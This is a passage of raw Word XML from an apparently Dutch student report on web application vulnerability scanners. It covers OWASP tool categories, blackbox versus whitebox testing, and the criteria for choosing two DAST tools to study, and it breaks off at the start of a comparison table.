        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB078D" w14:textId="2119AE99" w:rsidR="006C5389" w:rsidRPr="006C5389" w:rsidRDefault="0043426C" w:rsidP="006C5389">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="556EF204" wp14:editId="7DB5CFCC">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Grafiek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BAB54F5" w14:textId="77777777" w:rsidR="00466D48" w:rsidRPr="0025062D" w:rsidRDefault="009914EA" w:rsidP="00F33F92">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Grafiek </w:t>
      </w:r>
      <w:r w:rsidR="005401FF" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="008B2EEC" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005401FF" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="005A184E" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Out-of-date</w:t>
      </w:r>
      <w:r w:rsidR="00B64760" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMS</w:t>
      </w:r>
      <w:r w:rsidR="003609B3" w:rsidRPr="0025062D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> platformen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D86F8" w14:textId="77777777" w:rsidR="00E920BB" w:rsidRDefault="00E920BB" w:rsidP="00053609">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60373466" w14:textId="4C7A003F" w:rsidR="00F06533" w:rsidRPr="00053609" w:rsidRDefault="00CC56F3" w:rsidP="00053609">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053609">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5FD1A7" w14:textId="1574D5AE" w:rsidR="00554FF4" w:rsidRDefault="00ED600D" w:rsidP="0013783D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc491022068"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="009A2EB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="711B9907" w14:textId="5A7BE0D6" w:rsidR="004A02C8" w:rsidRPr="0099118F" w:rsidRDefault="005B464A" w:rsidP="005B464A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc491022069"/>
      <w:r>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="0099118F">
        <w:t>Inleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="33ED3AEC" w14:textId="40CB0385" w:rsidR="00044CDE" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t>In de afgelope</w:t>
      </w:r>
      <w:r w:rsidR="00273608">
        <w:t>n decennia zijn er heel wat web</w:t>
      </w:r>
      <w:r w:rsidR="00B53D64">
        <w:t>applicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scanners op de markt verschenen, zowel commercieel als open source (gratis).</w:t>
      </w:r>
      <w:r w:rsidR="00BD5BCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00273608">
        <w:t>Er zijn verschillende soorten webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="00535701">
        <w:t xml:space="preserve">s die ingezet kunnen worden op een variatie van </w:t>
      </w:r>
      <w:r w:rsidR="00273608">
        <w:t>vlaktes binnen een webapplicatie.</w:t>
      </w:r>
      <w:r w:rsidR="009B23B8">
        <w:t xml:space="preserve"> Zo kunnen </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="009B23B8">
        <w:t xml:space="preserve">s onderverdeeld worden in twee hoofdcategorieën </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A55EA">
        <w:t>Blackbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A55EA">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A55EA">
        <w:t>Whitebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> testing. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A55EA">
        <w:t>Blackbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A55EA">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> wordt geassocieerd met het testen van de buitenkant van een webapplicatie zonder kennis te hebben over de interne werking van de applicatie. Bij </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A55EA">
        <w:t>Whitebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A55EA">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A55EA">
        <w:t xml:space="preserve"> wordt gerefereerd naar het testen vanuit de binnenkant van de applicatie. Dit heeft betrekking op het testen op kwetsbaarheden van de broncode. </w:t>
      </w:r>
      <w:r w:rsidR="00964001">
        <w:t xml:space="preserve">Vanuit deze twee categorieën hebben organisaties zoals </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00964001">
        <w:t>OWASP tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00964001">
        <w:t xml:space="preserve"> ontwikkeld voor het detecteren van kwetsbaarheden vanuit de buitenkant en bin</w:t>
      </w:r>
      <w:r w:rsidR="00372C39">
        <w:t>nenkant van een web applicatie.</w:t>
      </w:r>
      <w:r w:rsidR="00964001">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631E2C8" w14:textId="52224960" w:rsidR="00044CDE" w:rsidRDefault="00B21DE6" w:rsidP="00554FF4">
      <w:r>
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00A436F9">
        <w:t>s kun</w:t>
      </w:r>
      <w:r w:rsidR="008B0E3A">
        <w:t xml:space="preserve"> je</w:t>
      </w:r>
      <w:r w:rsidR="00A436F9">
        <w:t xml:space="preserve"> volgens OWASP in vijf categorieën </w:t>
      </w:r>
      <w:r w:rsidR="00044CDE">
        <w:t>verdelen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0AF405" w14:textId="7BE7963A" w:rsidR="00E32F67" w:rsidRDefault="00E32F67" w:rsidP="00554FF4">
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E32F67">
        <w:t>https://www.owasp.org/index.php/Category:Tools_Categories</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479860F" w14:textId="50C51C28" w:rsidR="00660971" w:rsidRDefault="00D47C6F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Modeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717280D3" w14:textId="67583E4C" w:rsidR="00D47C6F" w:rsidRPr="0089550C" w:rsidRDefault="00D47C6F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089550C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Source Code Analysis Tools (SAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D60DF6" w14:textId="12F236F5" w:rsidR="00D47C6F" w:rsidRPr="0089550C" w:rsidRDefault="00D47C6F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089550C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="002E153A" w:rsidRPr="0089550C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">detection </w:t>
      </w:r>
      <w:r w:rsidRPr="0089550C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Scanning Tools (DAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD924A" w14:textId="388003F1" w:rsidR="00D47C6F" w:rsidRPr="0089550C" w:rsidRDefault="00D47C6F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089550C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Interactive Application Security Testing Tools (IAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19721BEB" w14:textId="7752FA6E" w:rsidR="00D47C6F" w:rsidRDefault="00D47C6F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Penetration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B29F4" w14:textId="2495D535" w:rsidR="004102B3" w:rsidRDefault="00E76C26" w:rsidP="00FA7D89">
      <w:r>
        <w:t xml:space="preserve">Van de vijf categorieën zal ik er alleen maar één behandelen </w:t>
      </w:r>
      <w:r w:rsidR="003443FB">
        <w:t>in dit do</w:t>
      </w:r>
      <w:r w:rsidR="00B84806">
        <w:t xml:space="preserve">cument en dat is de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B84806">
        <w:t>DAST tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B84806">
        <w:t xml:space="preserve">. De reden hiervoor is omdat ik voor het project een MVP </w:t>
      </w:r>
      <w:r w:rsidR="00E55514">
        <w:t>zal ontwikkelen dat</w:t>
      </w:r>
      <w:r w:rsidR="00030F7F">
        <w:t xml:space="preserve"> van de bu</w:t>
      </w:r>
      <w:r w:rsidR="007B7BF4">
        <w:t xml:space="preserve">itenkant, dus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B7BF4">
        <w:t>Blackbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7BF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B7BF4">
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7BF4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DB76BB">
        <w:t>kwetsbaarheden</w:t>
      </w:r>
      <w:r w:rsidR="004E52D5">
        <w:t xml:space="preserve"> det</w:t>
      </w:r>
      <w:r w:rsidR="00EE7F64">
        <w:t xml:space="preserve">ecteert van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EE7F64">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EE7F64">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D3145" w14:textId="0B4129D9" w:rsidR="002D52EB" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">In dit deel zal ik onderzoek doen naar een aantal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DAST tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> om inzicht te krijgen in de werkwijze van de verschillende scanners. Ieder scanner verschilt in omvang, scan proces, software architectuur, het analytische vermogen, de wijze van rapporteren, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>etc..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Het is interessant om een aantal</w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te bestuderen om zo hun werkwijze te leren kennen. Dit zal mij nieuwe inzichten bieden en zal mij helpen mijn eigen </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te verbeteren.</w:t>
      </w:r>
      <w:r w:rsidR="00365791">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve">Ook </w:t>
      </w:r>
      <w:r w:rsidR="00365791">
        <w:t>zal</w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve"> ik</w:t>
      </w:r>
      <w:r w:rsidR="00365791">
        <w:t xml:space="preserve"> naar de </w:t>
      </w:r>
      <w:r w:rsidR="00ED54A6">
        <w:t xml:space="preserve">fundamentele aspecten </w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve">waaruit een </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="006E4F41">
        <w:t xml:space="preserve"> gebouwd is. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D196A" w14:textId="77777777" w:rsidR="008072E9" w:rsidRDefault="00635A66" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">OWASP heeft een lijst van </w:t>
      </w:r>
      <w:r w:rsidR="00D42084">
        <w:t xml:space="preserve">40 DAST gepubliceerd; deze lijst is op 26 juli ’17 voor het laatst </w:t>
      </w:r>
      <w:r w:rsidR="000E3810">
        <w:t xml:space="preserve">geüpdatet. </w:t>
      </w:r>
      <w:r w:rsidR="00AB470E">
        <w:t xml:space="preserve">Deze lijst bevat zowel commerciële als open source tools. </w:t>
      </w:r>
      <w:r w:rsidR="00A63EA8">
        <w:t>Ik zal er twee uit selecteren voor dit onderzoek, één zal commercieel zijn en d</w:t>
      </w:r>
      <w:r w:rsidR="00085003">
        <w:t>e ander open source.</w:t>
      </w:r>
      <w:r w:rsidR="00A63EA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00085003">
        <w:t xml:space="preserve">Ik heb drie eisen opgesteld voor het selectieproces, 1) </w:t>
      </w:r>
      <w:r w:rsidR="00A63EA8">
        <w:t>is dat beide voorloper moeten</w:t>
      </w:r>
      <w:r w:rsidR="00085003">
        <w:t xml:space="preserve"> zijn op gebied van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00085003">
        <w:t>DAST tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00085003">
        <w:t xml:space="preserve"> en 2) het moeten goed gedocumenteer</w:t>
      </w:r>
      <w:r w:rsidR="00EF4D9D">
        <w:t xml:space="preserve">de tools zijn en als laatste 3) </w:t>
      </w:r>
      <w:r w:rsidR="007531F3">
        <w:t>de tool moet makkelijk te verkrijgen zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0146DD77" w14:textId="380DBF57" w:rsidR="000D6E12" w:rsidRDefault="00EF4415" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">De eisen dienen als regels die het zoeken naar een geschikte </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00215E17">
        <w:t xml:space="preserve"> vereenvoudigd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44708ACD" w14:textId="73E5719A" w:rsidR="00465CE3" w:rsidRDefault="00465CE3" w:rsidP="00554FF4">
      <w:r>
        <w:t>Regels</w:t>
      </w:r>
      <w:r w:rsidR="00A825F1">
        <w:t>/eisen uitgelegd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0DA59" w14:textId="72A9B03E" w:rsidR="00A825F1" w:rsidRDefault="00B21DE6" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00F13F9C">
        <w:t xml:space="preserve">s die goed onderhouden worden met de laatste technologische vooruitgangen kan mij meer inzicht bieden dan een verouderde tool. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE9CD0" w14:textId="1F6F5136" w:rsidR="00F13F9C" w:rsidRDefault="00DC47A7" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Goed gedocumenteerde tools bieden mij meer informatie aan over de werking van de tool voor mijn onderzoek.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D80AFE8" w14:textId="067075BB" w:rsidR="00DC47A7" w:rsidRDefault="00755D40" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Met </w:t>
      </w:r>
      <w:r w:rsidR="00996EC7">
        <w:t>tools die gemakkelijk verkrijgbaar zijn bedoel ik dat er geen hele registratie proces en goedkeuring vooraf moet gaan voordat ik er echt gebruik van kan maken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18776CFC" w14:textId="00D2E8BF" w:rsidR="00E21CD2" w:rsidRDefault="00BC56F0" w:rsidP="000C5216">
      <w:r>
        <w:t>Ik zal de beschikbare tools met deze drie regels/eisen valideren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C89B92F" w14:textId="77777777" w:rsidR="00465CE3" w:rsidRDefault="00465CE3" w:rsidP="00554FF4"/>
    <w:p w14:paraId="204DB903" w14:textId="5CCDF83F" w:rsidR="002D52EB" w:rsidRDefault="00C85ADB" w:rsidP="00F57F49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc491022070"/>
      <w:r>
        <w:t xml:space="preserve">3.4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00CA7745" w:rsidRPr="003B3CF1">
        <w:t xml:space="preserve">Beschikbare </w:t>
      </w:r>
      <w:r w:rsidR="00B21DE6">
        <w:t>Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00CA7745" w:rsidRPr="003B3CF1">
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="010D150E" w14:textId="1C90D4A5" w:rsidR="00867C9B" w:rsidRPr="00910A6E" w:rsidRDefault="00910A6E" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In dit deel zal ik de beschikbare tools beoordelen op de volgende kenmerken </w:t>
      </w:r>
      <w:r w:rsidRPr="00910A6E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Technologie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000B38E8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Documentatie</w:t>
      </w:r>
      <w:r w:rsidR="000B38E8" w:rsidRPr="000B38E8">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000B38E8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00825CB6" w:rsidRPr="00825CB6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verkrijgbaarheid</w:t>
      </w:r>
      <w:r w:rsidR="005C4102" w:rsidRPr="005C4102">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000B38E8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A4FD1" w:rsidRPr="003A4FD1">
        <w:t>Verkrijgbaarheid geeft aan hoe makkeli</w:t>
      </w:r>
      <w:r w:rsidR="003A4FD1">
        <w:t xml:space="preserve">jk een tool </w:t>
      </w:r>
      <w:r w:rsidR="00EE7C94">
        <w:t xml:space="preserve">online </w:t>
      </w:r>
      <w:r w:rsidR="003A4FD1" w:rsidRPr="003A4FD1">
        <w:t xml:space="preserve">te </w:t>
      </w:r>
      <w:r w:rsidR="002626AE">
        <w:t xml:space="preserve">verkrijgen is. </w:t>
      </w:r>
      <w:r w:rsidR="00AE0D27">
        <w:t>Ik zal met laag, medium en hoog de niv</w:t>
      </w:r>
      <w:r w:rsidR="006E5E93">
        <w:t>eaus aangeven van de kenmerken.</w:t>
      </w:r>
      <w:r w:rsidR="00D625AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00683A38">
        <w:t>(OWASP, DAST lijst)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1755"/>
        <w:gridCol w:w="1487"/>
        <w:gridCol w:w="1868"/>
        <w:gridCol w:w="1936"/>
        <w:gridCol w:w="2016"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B4663" w14:paraId="611119E0" w14:textId="77777777" w:rsidTr="006B4663">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="676CAEAB" w14:textId="0F9C5A43" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006B4663" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1487" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DBD5754" w14:textId="61A66876" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006B4663" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Licentie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F75CCF5" w14:textId="1B671C82" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006B4663" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Technologie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1936" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7544AFFD" w14:textId="1580A741" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006B4663" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Documentatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="672066B5" w14:textId="18918FAC" w:rsidR="006B4663" w:rsidRPr="00DE5F6C" w:rsidRDefault="006B4663" w:rsidP="00554FF4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5F6C">
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Verkrijgbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B4663" w14:paraId="7E7B61E4" w14:textId="77777777" w:rsidTr="00A44CFB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1755" w:type="dxa"/>
